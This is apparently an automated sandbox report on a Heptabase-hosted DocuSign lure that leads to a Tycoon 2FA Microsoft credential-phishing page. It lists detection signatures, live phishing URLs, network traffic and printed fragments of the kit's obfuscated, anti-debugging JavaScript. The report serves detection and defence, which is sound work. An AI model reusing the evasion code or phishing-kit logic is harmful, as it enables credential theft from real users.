Edit tour

Windows Analysis Report
https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7

Overview

General Information

Sample URL:https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7
Analysis ID:1647358
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,8051527031639735662,391681969348511936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_138JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    2.23.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      2.20.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        2.20.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
          2.24..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            2.19.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              Click to see the 18 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://ms.naturdon.com/rqS5DHMtUFf3KT9q8ukN4yHulJtYoxvAk1NDcbB3pNrzjyAvira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/opSQsIIfCrYEifeBNcpBzLABefvLCJwGmOyMuRzcmBuX45133Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/efGejjtuNnmhRtNkGlHs8IHE7ijpHoVGG7mAI92qSys9uQiaNo78150Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/stjXGvT17JklTv4LfDUGVIPdaYnFaQdUW4jCMkD3HbMhZoqA0Z67SnPrMnOwyyOYBACmgPHP6wGVVWZbZOviWBaoaGgh254Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/ghN0n6xyqF79DUkCI7M5jl9tDKtEGk7pgxypCNYtBFhWI8elPUjiKnPef204Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/wxE3arEkk2RbNb59NyJropvgEEl7AIwr34125Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/GDSherpa-regular.woffAvira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/ijDh3NnwhFxGLRV4LwW2300gHnRdqrb51FENUw7805QPX1NNab230Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/kleRO9JVys2NlTKKYiRt12w9NfiqKjLiiBbqOE07EDpVPCYTbXYoOXDS2ZtRvcD9w4YjWzcKTWa9tmSgbDuolYpqsXv8GNph76iirb3Gh5eLR6hFTzubcQLg5pdZAdNeB8tRVtUFZIBB7Uj497bIA4m2QpRzW8rW7SPyz660Avira URL Cloud: Label: phishing
              Source: https://ms.naturdon.com/xynACghvrsuVjigh30Avira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'ms.naturdon.com' does not match the legitimate domain for Microsoft., The URL contains 'ms', which could be an attempt to mimic 'Microsoft', but it is not a full match., The domain 'naturdon.com' is not associated with Microsoft and appears unrelated., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but given the domain mismatch, it raises suspicion. DOM: 3.9.pages.csv
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'ms.naturdon.com' does not match the legitimate domain 'microsoft.com'., The use of 'ms' in the subdomain could be an attempt to mimic 'Microsoft', but the main domain 'naturdon.com' is unrelated to Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but given the domain mismatch, it raises suspicion., The domain 'naturdon.com' does not have any known association with Microsoft, increasing the likelihood of phishing. DOM: 3.8.pages.csv
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.8.pages.csv, type: HTML
              Source: Yara matchFile source: 2.20.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: Yara matchFile source: 2.6.pages.csv, type: HTML
              Source: Yara matchFile source: 2.20.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.24..script.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: Yara matchFile source: 3.38..script.csv, type: HTML
              Source: Yara matchFile source: 2.6.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_138, type: DROPPED
              Source: Yara matchFile source: 3.35.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.23.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.19.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.30..script.csv, type: HTML
              Source: Yara matchFile source: 2.28.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.31..script.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.8.pages.csv, type: HTML
              Source: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7?id=c9bfc81f-fa96-4dff-99fa-279a46da3576Joe Sandbox AI: Page contains button: 'VIEW PDF DOCUMENT' Source: '1.2.pages.csv'
              Source: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7?id=c9bfc81f-fa96-4dff-99fa-279a46da3576Joe Sandbox AI: Page contains button: 'VIEW PDF DOCUMENT' Source: '1.3.pages.csv'
              Source: 2.21..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ms.naturdon.com/iVYo/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
              Source: Chrome DOM: 1.2OCR Text: Q A document has been shared with you Monday Mar 24, 2025 Docuser A PDF document has been shared with you cn DocuSign for business. To viev.% follow the 'View POF Document" below VIEW PDF DOCUMENT
              Source: Chrome DOM: 1.3OCR Text: Q A document has been shared with you Monday Mar 24, 2025 Monday Mar 24, 202 Docufibn Docuser A PDF document has been shared with you on A PDF document has b DocuSign for business. To view, follow the 'iView DocuSign for business, PDF Document" below Document" below VIEW PDF DOCUMI VIEW PDF DOCUMENT
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: Number of links: 0
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://ms.naturdon.com/iVYo/HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function ufNfDWfsCu(event) { co...
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: Title: Enter Secure Login Portal does not match URL
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: Invalid link: Terms of use
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: Invalid link: Privacy & cookies
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "eqtms";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/yffv1vad9p9hmqzugsh8sfc0at0wf1fdjwid9g7k8lovrr2l";var gdf = "/ijzsmqgrfzt446fhkjtfgmhsauyznur1umsfv4xkfurzcd120";var odf = "/ghmuqk9nrppxlmlfuypqduvvrisuztaycd650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i)){ browser...
              Source: https://ms.naturdon.com/iVYo/HTTP Parser: function jbwnliuowx(){wnpivixibt = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+rwr1vmlzaw9uic0gvhjhbnnmb3jtaw5nievkdwnhdglvbjwvdgl0bgu+ciagphn0ewxlpgogicagym9kesb7ciagicagigzvbnqtzmftawx5oianu2vnb2ugvuknlcbuywhvbwesiedlbmv2yswgvmvyzgfuyswgc2fucy1zzxjpzjskicagicagbwfyz2luoiawowogicagicbwywrkaw5noiawowogicagicbiywnrz3jvdw5klwnvbg9yoiajzjlmowy5owogicagicbjb2xvcjogizmzmzskicagih0kicagighlywrlcib7ciagicagigjhy2tncm91bmq6igxpbmvhci1ncmfkawvudcgxmzvkzwcsicm2ytexy2isicmyntc1zmmpowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzognjbwecaymhb4owogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogm3jlbtskicagicagzm9udc13zwlnahq6igjvbgq7ciagicb9ciagicbozwfkzxigccb7ciagicagigzvbnqtc2l6ztogms4ycmvtowogicagicbtyxjnaw4tdg9woiaxmhb4owogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogcmdiysgyntusidi1nswgmju1lcawljkpowogi...
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: <input type="password" .../> found
              Source: https://ms.naturdon.com/iVYo/HTTP Parser: No favicon
              Source: https://ms.naturdon.com/iVYo/HTTP Parser: No favicon
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: No favicon
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: No <meta name="author".. found
              Source: https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNRHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 13.56.83.2:443 -> 192.168.2.17:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.56.83.2:443 -> 192.168.2.17:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.31.133:443 -> 192.168.2.17:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.31.133:443 -> 192.168.2.17:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.30.133:443 -> 192.168.2.17:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.10.212:443 -> 192.168.2.17:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.30.133:443 -> 192.168.2.17:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.10.212:443 -> 192.168.2.17:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.65.164:443 -> 192.168.2.17:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49874 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49931 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.17:49995 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.249.86.140:443 -> 192.168.2.17:49997 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.128.128.0:443 -> 192.168.2.17:49998 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.17:49999 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.128.128.0:443 -> 192.168.2.17:50004 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.249.86.140:443 -> 192.168.2.17:50006 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.72.12.70:443 -> 192.168.2.17:50010 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.249.91.19:443 -> 192.168.2.17:50014 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.56.83.2:443 -> 192.168.2.17:50012 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.72.12.70:443 -> 192.168.2.17:50015 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.67.25.91:443 -> 192.168.2.17:50020 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.139.47.46:443 -> 192.168.2.17:50023 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.139.47.46:443 -> 192.168.2.17:50022 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.249.86.140:443 -> 192.168.2.17:50025 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.219.120.97:443 -> 192.168.2.17:50027 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 16.15.4.12:443 -> 192.168.2.17:50029 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.128.128.0:443 -> 192.168.2.17:50030 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.128.128.0:443 -> 192.168.2.17:50031 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.46:443 -> 192.168.2.17:50033 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.46:443 -> 192.168.2.17:50032 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:50034 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:50036 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.165:443 -> 192.168.2.17:50042 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.165:443 -> 192.168.2.17:50045 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.46:443 -> 192.168.2.17:50049 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:50051 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.17:50062 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.17:50064 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.17:50068 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.17:50063 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.17:50095 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:50102 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 8MB later: 39MB
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: global trafficHTTP traffic detected: GET /w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7 HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/main-4c0c8700.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/accountApi-ff2af548.css HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/index-18bd8637.css HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/accountApi-672c2e6f.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/spark-md5-9953c3d1.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/_commonjs-dynamic-modules-5cb9de4b.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pr/js HTTP/1.1Host: get.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR HTTP/1.1Host: get.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://app.heptabase.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com
              Source: global trafficHTTP traffic detected: GET /pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR HTTP/1.1Host: partnerlinks.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://app.heptabase.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
